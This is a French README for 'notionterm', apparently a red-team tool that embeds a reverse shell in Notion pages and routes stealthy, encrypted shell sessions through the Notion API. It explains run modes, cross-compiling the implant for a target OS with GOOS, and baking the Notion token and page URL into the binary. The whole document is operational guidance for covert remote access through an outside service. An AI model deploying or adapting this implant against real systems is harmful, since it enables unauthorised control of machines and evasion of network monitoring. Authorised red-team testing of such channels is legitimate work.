
Intégrer un reverse shell dans des pages Notion en utilisant l'API Notion comme proxy, permettant des sessions shell distantes furtives avec communication chiffrée et authentifiée pour les opérations d'équipe rouge.

notionterm sur la cible.
approximativement inspiré par la grande idée de OffensiveNotion et notionion!
Apprendre les commandes et les flags est trop ennuyeux : Utilisez wrap-notionterm.sh
notionterm et transférez-le sur la machine cible (voir Build)Il y a 3 façons principales d'exécuter notionterm :
notionterm [flags]
ON, faites vos trucs de reverse shell, passez à OFF pour mettre en pause, ON pour reprendre, etc...
notionterm --server [flags]
CTRL+L pour l'obtenir) : https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light
notionterm light [flags]
Comme notionterm est destiné à être exécuté sur la machine cible, il doit être compilé pour s'y adapter.
Ainsi, définissez les variables d'environnement pour correspondre aux exigences de la cible :
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
Vous devrez définir la clé API et l'URL de la page Notion en utilisant soit les variables d'environnement (NOTION_TOKEN & NOTION_PAGE_URL), soit les flags (--token & --page-url)
Intégrez directement le token d'API d'intégration Notion et l'URL de la page Notion dans le binaire. ⚠️ toute personne ayant accès au binaire peut récupérer le token. Pour des raisons de sécurité, ne le partagez pas et supprimez-le après utilisation.
Définissez les variables d'environnement correspondantes :
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
Et compilez-le :
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS